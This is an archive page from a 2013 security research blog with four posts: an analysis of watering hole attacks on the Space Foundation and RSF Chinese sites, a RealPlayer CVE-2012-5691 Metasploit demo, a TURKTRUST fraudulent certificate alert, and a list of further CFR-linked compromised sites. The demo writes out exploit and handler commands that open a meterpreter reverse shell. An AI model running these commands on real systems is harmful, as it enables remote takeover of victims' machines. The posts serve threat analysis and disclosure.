Yearly Archives: 2013

Forgotten Watering Hole Attacks On Space Foundation and RSF Chinese

06/01/2013VariousAPT, CVE-2012-4969, IE 0Day, Internet Explorer, Internet Explorer 0day, Jsbug, Microsoft, MS12-063, MSA-2757760, RSF Chinese, Space Foundation, watering hole attackswow

As I announced you on Twitter, this blog post will present targeted attacks who have start mid-September and wasn’t discussed or presented in public. These attacks have end around mid-October.

My next post will cover the targeted attacks against http://t.co/Cy1hN4oY and http://t.co/71oggmv4 http://t.co/70cSitaN

— Eric Romang (@eromang) December 29, 2012

A web site “arpeggio8.com“, hosted on 205.186.179.195 in US, was compromised in order to be used in a watering hole attack against Space Foundation and RSF Chinese.

The Space Foundation is a nonprofit organization that supports the global space industry through information and education programs. It is a resource for the entire space community – industry, national security organizations, civil space agencies, private space companies and the military around the world. It also supports educators, students and journalists with information and education programs.

Reporters Without Borders (RWB) is a French-based international non-governmental organization that advocates freedom of the press and freedom of information. Reporters Without Borders is also known as RSF, and RSF Chinese is a dedicated web site for Chinese news in Chinese language.

The watering hole attack was done through different files and by a dedicated centralized backend named “Jsbug“.

Description of the watering hole attack

Space Foundation and RSF Chinese web sites had they’re code a malicious javascript inclusion calling “http://www.arpeggio8.com/count/count.php“.

“count.php” script provide javascript content who check the presence of “popad” cookie and if the browser is Internet Explorer 6, 7 or 8. This script also load “count2.php” who is used for another purposes, we will discuss about this file later. If all the conditions are in place “rsf.php” file is loaded with parameter “id=1024“.

“rsf.php” script only provide content if parameter “id=1024” is present. This script load through an iframe call “ie.html” file. “rsf.php” is the equivalent of “exploit.html” in the CVE-2012-4969 0day found in mid-September.

“ie.html” file is the equivalent of “Protect.html” in the CVE-2012-4969 0day found in mid-September, but here no Flash file is involved to do the heap spray. “ie.html” file is containing a packed javascript code how will do the heap spray and trigger the vulnerability. Pastebin encoded version and decoded version.

The javascript is decoded though the “decode” function and the key “0xe1” for decoding is provided as argument to the function. The javascript “int_to_hex” function will check if Oracle Java 6 is present, if operating system is Windows 7 or XP and if Internet Explorer 9 is used. The script will also gather the browser language.

If Windows XP is used, and language is “en-us“, “zh-cn“, “zh-tw“, “ko” or “ja” (hum hum CVE-2012-4792…), then the vulnerability is triggered.

If Windows 7 is used and Java 6 is installed, then the vulnerability is triggered. A spray base value is provided in the code for Internet Explorer 9 , but “count.php” has filter the targeted browsers.

Once the vulnerability is triggered, “917.exe” (6b4aa596e5a4208371942cdb0e04dfd9) file is installed. This malware is known as “Trojan-Dropper.Win32.Dapato.bscc“.

A interesting point regarding “ie.html” file, this file was dating of 19 September.

Some facts regarding CVE-2012-4969 :

Vulnerability was discovered exploited in the wild, with a Flash variant, the 14 September.
Metasploit PoC was provided the 17 September.
Microsoft Security Advisory MSA-2757760 was published the 17 September.
Microsoft patch was provided in MS12-063 the 21 September.

But you will see, through the next chapter, that the attack has began the 18 September.

“count2.php” script and Jsbug backend usage

“count2.php” script is loaded in any cases for statistics purposes. This script will create and check two cookies “stat_cookie” and “stat_time“, gather version of Adobe Flash, presence of Oracle Java and HTTP referrer. All these informations are send back to the same script with parameters.

http://arpeggio8.com/count/count2.php?n=’+Math.random()+’&action=jpg&stat_refer=’+escape(location.href)+’&stat_flash=’+escape(flashVer)+’&stat_java=’+escape(stat_java)+’&stat_cookie=’+stat_cookie+’&stat_time=’+stat_time;

All these informations are stored in a backend named “Jsbug“. This backend is quiet simple, only three menus “Client statistics“, “Report” and “Create Exploit“. The backend doesn’t have any external css or images files, and is typically composed of minimum three PHP scripts.

Login page of the backend is also quiet simplistic, no page title, no text in the page, and this logic of simplicity make it harder to discover through Google searches.

“Client statistics” menu will direct you on a recap page, of all visitors who have load “count2.php“, with OS type, browser type and version, version of Adobe Flash, version of Oracle Java, IP address, HTTP referer, number of visits, first visite and last visite date.

In the case of the Space Foundation watering hole attack, the first date are beginning 18 September.

In the case of RSF Chinese watering hole attack, the first date are beginning 19 September.

These attacks have ended around mid-October.

“Report” menu will direct you on a statistics page, of all visitors.

“Create Exploit” menu is a page how will help the attackers to generate they’re javascript inclusion code.

CVE-2012-5691 RealPlayer RealMedia File Handling Buffer Overflow Metasploit Demo

06/01/2013Exploits, MetasploitCVE-2012-5691, RealNetworks, RealPlayerwow

Timeline :

Vulnerability discovered and reported to vendor by auto
Coordinated public release of the vulnerability the 2012-12-14
Metasploit PoC provided the 2012-12-25

PoC provided by :

suto

Reference(s) :

CVE-2012-5691
OSVDB-88486
BID-56956
RealNetworks Security Advisory

Affected version(s) :

Real Player version 15.0.5.109 and bellow

Tested on Windows XP Pro SP3 with :

Real Player 15.0.5.109

Description :

This module exploits a stack based buffer overflow on RealPlayer prior or equal to 15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure usage of the GetPrivateProfileString function to retrieve the URL property from an InternetShortcut section. This module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click methods.

Commands :

use exploit/windows/fileformat/real_player_url_property_bof
set FILENAME msf.rm
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j

sysinfo
getuid

Fraudulent TURKTRUST Digital Certificat Used In Active Attacks

04/01/2013VariousFirefox, Google, Internet Explorer, KB2798897, Microsoft, Mozilla, MSA-2798897, TURKTRUSTwow

Google, Microsoft and Mozilla have release alerts regarding active attacks using fraudulent digital certificates issued by TURKTRUST, a Turkish certificate authority and a subsidiary company of Turkish Armed Forces ELELE Foundation Company.

Google alert precise that on 24 December they detected and blocked an unauthorized digital certificate for the “*.google.com” domain. This certificat was issued by an intermediate certificate authority (CA) linked to TURKTRUST. After investigation, in collaboration with TURKTRUST, it appears that an additional intermediate certificate authority was also compromised. Google Chrome certificate revocation list has been updated the 26 December to block these fraudulent intermediate CA.

Microsoft has release an Security Advisory MSA-2798897, who affects all supported releases of Microsoft Windows. Microsoft is updating the Certificate Trust list and provide an update for all supported releases of Microsoft Windows that removes these fraudulent certificates. Systems using Windows 8, Windows RT, Windows Server 2012, and devices running Windows Phone 8 are automatically updated and protected.

The following certificates will be added to the Untrusted Certificates folder:

Certificate “*.google.com” issued by “*.EGO.GOV.TR” with thumbprint “4d 85 47 b7 f8 64 13 2a 7f 62 d9 b7 5b 06 85 21 f1 0b 68 e3“.
Certificate “e-islem.kktcmerkezbankasi.org” issued by “TURKTRUST Elektronik Sunucu Sertifikasi Hizmetleri” with thumbprint “f9 2b e5 26 6c c0 5d b2 dc 0d c3 f2 dc 74 e0 2d ef d9 49 cb“.
Certificate “*.EGO.GOV.TR” issued by “TURKTRUST Elektronik Sunucu Sertifikasi Hizmetleri” with thumbprint “c6 9f 28 c8 25 13 9e 65 a6 46 c4 34 ac a5 a1 d2 00 29 5d b1“.

Mozilla has release a Security Blog Post and take a different position than Google or Microsoft. The foundation will actively revoke trust for the two fraudulent certificates, but also suspend inclusion of the “TÜRKTRUST Bilgi ?leti?im ve Bili?im Güvenli?i Hizmetleri A.?. (c) Aral?k 2007” root certificate, pending further review. A new release of Firefox will be released on Tuesday 8th January.

These fraudulent certificate could be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks, so we advise you to update asap.

Chinese Uygur Minority Also Targeted in the CFR Watering Hole Attack And More

03/01/2013VariousAPT, CFR, China, CVE-2012-4792, Internet Explorer, KB2794220, Microsoft, MSA-2794220, PHIL-AM Tour, Taiwan, Uygur, Uygur Haber Ajansiwow

In my last blog post I reported you that the watering hole attack, involving an Internet Explorer 0day, was not limited to CFR.org, but also to energy manufacturer Capstone Turbine Corp. I also confirmed you that the attack has start minimum beginning December, and that some of these infected web sites were also previously infected with another Internet Explorer 0day discovered in September 2012.

After some additional researches I found two new web sites involved in the watering hole attack.

PHIL-AM Tour (http://www.philam.com.tw)

This web site, a Taiwanese travel agency, has been found infected through a Google dork and the “Helps.html” page is still in Google cache, but the web site has been cleaned. You can find the source code of the infected page on Pastebin. This web page was also analyzed trough jsunpack the 31 December.

Uygur Haber Ajansi (www.uygurunsesi.com)

This web site, a dissident Uygur web site, has been found infected through a Google dork and the “Helps.html” page is live. So take care if you visite this web site, you could be infected. Uygur are a Turkic ethnic group living in Eastern and Central Asia. Today, Uyghurs live primarily in the Xinjiang Uyghur Autonomous Region in the People’s Republic of China.

Same as for Capstone Turbine Corp. web site, this web site was also previously infected by CVE-2012-4969 I discovered in September. “Grumgog.swf” is in the house.

Samples collected on this web site:

robots.txt (96b01d14892435ae031290cd58d85c2e)
today.swf (4df26a39734992ff7a8d95cc44542b2b)
xsainfo.jpg (7c713c44e34fa8e63745744e3b7221db)
news.html (76d14311bae24a40816e3832b1421dee)
Helps.html (a25c13d4edb207e6ce153469c1104223)

Eric Romang Blog

aka wow on ZATAZ.com